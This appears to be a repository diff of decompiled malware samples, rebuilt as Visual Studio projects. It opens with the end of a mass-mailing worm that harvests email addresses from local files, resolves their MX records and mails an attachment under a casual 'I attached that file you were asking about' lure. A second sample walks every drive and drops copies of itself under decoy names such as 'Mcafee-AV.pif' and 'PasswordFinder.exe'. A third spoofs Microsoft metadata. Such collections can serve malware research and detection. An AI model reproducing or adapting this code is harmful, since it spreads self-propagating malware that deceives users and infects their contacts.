string address2 = Convert.ToString(obj);
if (address1 != address2 && !arrayList.Contains((object) address1))
{
arrayList.Add((object) address1);
MailAddress to = new MailAddress(address1);
MailMessage message = new MailMessage(new MailAddress(address2), to);
message.Subject = "Hey";
message.Body = "Hey hows it going? I attached that file you were asking about. Let me know if it worKs for you or not. I'm not sure what I'm going to do the tommorow maybe get some coffee and do some shopping. Well give me a call later okay?";
message.Attachments.Add(attachment);
string mxRecords = this.GetMXRecords(address1.Substring(address1.IndexOf("@")).Replace("@", string.Empty));
try
{
new SmtpClient(mxRecords).Send(message);
}
catch (Exception ex)
{
}
}
}
}
attachment.Dispose();
}
private ArrayList SearchEmails(string dir, string fileType)
{
ArrayList arrayList = new ArrayList();
foreach (FileInfo file in new DirectoryInfo(dir).GetFiles(fileType))
{
Console.WriteLine(file.FullName);
StreamReader streamReader = File.OpenText(file.FullName);
string InputData;
while ((InputData = streamReader.ReadLine()) != null)
{
string addr = this.ExtractAddr(InputData);
if (addr != "" && !arrayList.Contains((object) addr) && new Regex("^([a-zA-Z0-9_\\-\\.]+)@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.)|(([a-zA-Z0-9\\-]+\\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\\]?)$").IsMatch(addr) && !arrayList.Contains((object) addr))
arrayList.Add((object) addr);
}
}
return arrayList;
}
public string ExtractAddr(string InputData)
{
int num1 = InputData.IndexOf("@", 0) + 1;
int num2 = 1;
int num3 = InputData.Length;
string addr = "";
if (num1 == 0)
return addr;
for (int index = num1 - 1; index >= 1; --index)
{
string str = InputData.Substring(index - 1, 1);
if (str == " " | str == "<" | str == "(" | str == ":" | str == "," | str == "[")
{
num2 = index + 1;
break;
}
}
for (int index = num1 + 1; index <= InputData.Length; ++index)
{
string str = InputData.Substring(index - 1, 1);
if (str == " " | str == ">" | str == ")" | str == ":" | str == "," | str == "]")
{
num3 = index - 1;
break;
}
}
return Regex.Replace(InputData.Substring(num2 - 1, num3 - num2 + 1), "<(.|\\n)*?>", string.Empty).Replace("&nbsp;", "").Replace(" ", "").Replace("\"", "");
}
private string GetFile()
{
string file = "";
if (this.arInfect.Count > 0)
{
foreach (object obj in this.arInfect)
file = Convert.ToString(obj);
}
return file;
}
public string GetMXRecords(string host)
{
IntPtr zero1 = IntPtr.Zero;
IntPtr zero2 = IntPtr.Zero;
int num = Snoopy.Snoopy.Dns(ref host, 15, 8, 0, ref zero1, 0);
string mxRecords = "";
Snoopy.Snoopy.STRMX structure;
if (num != 0)
{
mxRecords = host;
}
else
{
for (IntPtr ptr = zero1; !ptr.Equals((object) IntPtr.Zero); ptr = structure.pNext)
{
structure = (Snoopy.Snoopy.STRMX) Marshal.PtrToStructure(ptr, typeof (Snoopy.Snoopy.STRMX));
if (structure.sType == (short) 15)
{
string stringAuto = Marshal.PtrToStringAuto(structure.pNameEx);
if (stringAuto != "")
mxRecords = stringAuto;
}
}
}
return mxRecords;
}
private struct STRMX
{
public IntPtr pNext;
public string strName;
public short sType;
public int intFlag;
public int intTTL;
public int intRes;
public IntPtr pNameEx;
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740/Virus.MSIL.Small.h.csproj
+42
View File
@@ -0,0 +1,42 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Snoopy</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>Snoopy</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Snoopy.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740/Virus.MSIL.Small.h.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Snoopy", "Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.csproj", "{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/AssemblyInfo.cs
+8
View File
@@ -0,0 +1,8 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: Guid("ef734abf-6273-472c-ab64-4f2fb14840cc")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © Xo0 ")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/Form1.cs
+32
View File
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: test.Form1
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace test
{
public class Form1 : Form
{
private IContainer components;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: test.Properties.Resources
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace test.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (test.Properties.Resources.resourceMan == null)
test.Properties.Resources.resourceMan = new ResourceManager("test.Properties.Resources", typeof (test.Properties.Resources).Assembly);
return test.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => test.Properties.Resources.resourceCulture;
set => test.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/Properties/Settings.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: test.Properties.Settings
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace test.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/Virus.MSIL.Small.i.csproj
+48
View File
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>test</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>test</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="sex\program.cs" />
<Compile Include="sex\sex.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/Virus.MSIL.Small.i.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "test", "Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.csproj", "{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BEEA6F6F-BCA4-4EA4-B645-46C1D6A5DA16}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/sex/program.cs
+34
View File
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: sex.program
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System;
using System.IO;
namespace sex
{
internal static class program
{
[STAThread]
private static void Main()
{
sex.sex sex = new sex.sex();
for (char ch = 'B'; ch <= 'Z'; ++ch)
{
string str = ch.ToString() + ":\\";
if (Directory.Exists(str))
{
try
{
sex.DispEXE(str);
}
catch (Exception ex)
{
}
}
}
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1/sex/sex.cs
+164
View File
@@ -0,0 +1,164 @@
// Decompiled with JetBrains decompiler
// Type: sex.sex
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System;
using System.IO;
using System.Text.RegularExpressions;
namespace sex
{
internal class sex
{
public void DispEXE(string tD)
{
try
{
string[] directories = Directory.GetDirectories(tD);
string[] strArray = new string[38]
{
"own",
"it",
"upl",
"syst",
"set",
"usic",
"efu",
"am",
"caf",
"yma",
"mp3",
"wav",
"ovi",
"roj",
"win",
"ict",
"my",
"ina",
"Shar",
"aza",
"onk",
"mob",
"tart",
"ffic",
"av",
"rack",
"ile",
"W32",
"root",
"assw",
"Sounds",
"ideo",
"rit",
"ist",
"ys",
"orn",
"ew",
"amp"
};
foreach (string input in directories)
{
try
{
foreach (string pattern in strArray)
{
try
{
if (Regex.IsMatch(input, pattern))
{
if (Regex.IsMatch(input, "it"))
File.Copy("windows2006.exe", input + "\\NewWeb.exe");
if (Regex.IsMatch(input, "own"))
File.Copy("windows2006.exe", input + "\\Downloader.pif");
if (Regex.IsMatch(input, "upl"))
File.Copy("windows2006.exe", input + "\\upload-file.exe");
if (Regex.IsMatch(input, "syst"))
File.Copy("windows2006.exe", input + "\\system.dll.cmd");
if (Regex.IsMatch(input, "set"))
File.Copy("windows2006.exe", input + "\\setu.exe");
if (Regex.IsMatch(input, "usic"))
File.Copy("windows2006.exe", input + "\\MyMiusic.exe");
if (Regex.IsMatch(input, "efu"))
File.Copy("windows2006.exe", input + "\\defult-path.cmd");
if (Regex.IsMatch(input, "ame"))
File.Copy("windows2006.exe", input + "\\FunGame.flash.exe");
if (Regex.IsMatch(input, "caf"))
File.Copy("windows2006.exe", input + "\\Mcafee-AV.pif");
if (Regex.IsMatch(input, "ort"))
File.Copy("windows2006.exe", input + "\\PortScanner.exe");
if (Regex.IsMatch(input, "yma"))
File.Copy("windows2006.exe", input + "\\SymantecUpdate.exe");
if (Regex.IsMatch(input, "p3"))
File.Copy("windows2006.exe", input + "\\Mp3Player.pif");
if (Regex.IsMatch(input, "av"))
File.Copy("windows2006.exe", input + "\\WaveToMp32.exe");
if (Regex.IsMatch(input, "ovi"))
File.Copy("windows2006.exe", input + "\\Fun.pif");
if (Regex.IsMatch(input, "win"))
File.Copy("windows2006.exe", input + "\\winUpdate.cab.cmd");
if (Regex.IsMatch(input, "roj"))
File.Copy("windows2006.exe", input + "\\install-project.exe");
if (Regex.IsMatch(input, "ict"))
File.Copy("windows2006.exe", input + "\\mypic.scr");
if (Regex.IsMatch(input, "my"))
File.Copy("windows2006.exe", input + "\\myboy.exe");
if (Regex.IsMatch(input, "ina"))
File.Copy("windows2006.exe", input + "\\NewWinamp.exe");
if (Regex.IsMatch(input, "Shar"))
File.Copy("windows2006.exe", input + "\\Perl-install.pif");
if (Regex.IsMatch(input, "aza"))
File.Copy("windows2006.exe", input + "\\Learning.exe");
if (Regex.IsMatch(input, "mob"))
File.Copy("windows2006.exe", input + "\\mobileAV.exe");
if (Regex.IsMatch(input, "tart"))
File.Copy("windows2006.exe", input + "\\WinUser32.dll.exe");
if (Regex.IsMatch(input, "ffic"))
File.Copy("windows2006.exe", input + "\\newOffice.exe");
if (Regex.IsMatch(input, "rack"))
File.Copy("windows2006.exe", input + "\\TrackPlayer.exe");
if (Regex.IsMatch(input, "ile"))
File.Copy("windows2006.exe", input + "\\readMe.Txt.pif");
if (Regex.IsMatch(input, "orn"))
File.Copy("windows2006.exe", input + "\\pornoPic.scr");
if (Regex.IsMatch(input, "W32"))
File.Copy("windows2006.exe", input + "\\WinLearning.htm.cmd");
if (Regex.IsMatch(input, "root"))
File.Copy("windows2006.exe", input + "\\DefultRoot.pif");
if (Regex.IsMatch(input, "assw"))
File.Copy("windows2006.exe", input + "\\PasswordFinder.exe");
if (Regex.IsMatch(input, "Sounds"))
File.Copy("windows2006.exe", input + "\\NewSound.cmd");
if (Regex.IsMatch(input, "ideo"))
File.Copy("windows2006.exe", input + "\\0110Video.pif");
if (Regex.IsMatch(input, "rit"))
File.Copy("windows2006.exe", input + "\\CDWriter.exe");
if (Regex.IsMatch(input, "ist"))
File.Copy("windows2006.exe", input + "\\NewList.exe");
if (Regex.IsMatch(input, "ys"))
File.Copy("windows2006.exe", input + "\\Secure.exe");
if (Regex.IsMatch(input, "ew"))
File.Copy("windows2006.exe", input + "\\newFile.pif");
if (Regex.IsMatch(input, "amp"))
File.Copy("windows2006.exe", input + "\\NewWinamp.exe");
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
foreach (string directory in Directory.GetDirectories(tD))
this.DispEXE(directory);
}
catch (Exception ex)
{
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/AssemblyInfo.cs
+22
View File
@@ -0,0 +1,22 @@
using System;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: SatelliteContractVersion("3.0.0.0")]
[assembly: AssemblyFileVersion("3.0.4506.2152")]
[assembly: AssemblyCopyright("© Microsoft Corporation. All rights reserved.")]
[assembly: NeutralResourcesLanguage("en-US")]
[assembly: AssemblyInformationalVersion("3.0.4506.2152")]
[assembly: ComVisible(false)]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyDefaultAlias("infocard.exe")]
[assembly: AssemblyDescription("infocard.exe")]
[assembly: AssemblyTitle("infocard.exe")]
[assembly: CLSCompliant(false)]
[assembly: AssemblyProduct("Microsoft® .NET Framework")]
[assembly: AssemblyKeyFile("f:\\dd\\Tools\\devdiv\\EcmaPublicKey.snk")]
[assembly: AssemblyDelaySign(true)]
[assembly: AssemblyVersion("3.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/BrowserNavConstants.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: BrowserNavConstants
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[DebugInfoInPDB]
[NativeCppClass]
internal enum BrowserNavConstants
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/CallMode.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: CallMode
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[NativeCppClass]
[DebugInfoInPDB]
internal enum CallMode
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/CommandStateChangeConstants.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: CommandStateChangeConstants
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[NativeCppClass]
[DebugInfoInPDB]
internal enum CommandStateChangeConstants
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/HDC__.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HDC__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[MiscellaneousBits(65)]
[NativeCppClass]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HDC__
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/HINSTANCE__.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HINSTANCE__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
